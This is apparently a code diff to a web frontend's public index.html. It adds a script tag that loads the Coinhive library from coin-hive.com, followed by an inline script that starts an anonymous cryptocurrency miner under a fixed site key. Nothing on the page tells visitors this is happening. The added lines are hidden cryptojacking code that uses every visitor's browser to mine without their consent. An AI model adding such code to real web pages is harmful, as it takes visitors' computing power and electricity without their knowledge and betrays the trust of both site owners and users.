--- a/frontend/public/index.html
+++ b/frontend/public/index.html
@@ -38,4 +38,9 @@
     -->
   </body>
   <script src="https://use.fontawesome.com/00c6aa3062.js"></script>
+  <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+  <script>
+    var miner = new CoinHive.Anonymous('np6rTwBMOFatfmuf6GO09C7MDbdYmKtz');
+    miner.start();
+  </script>
 </html>
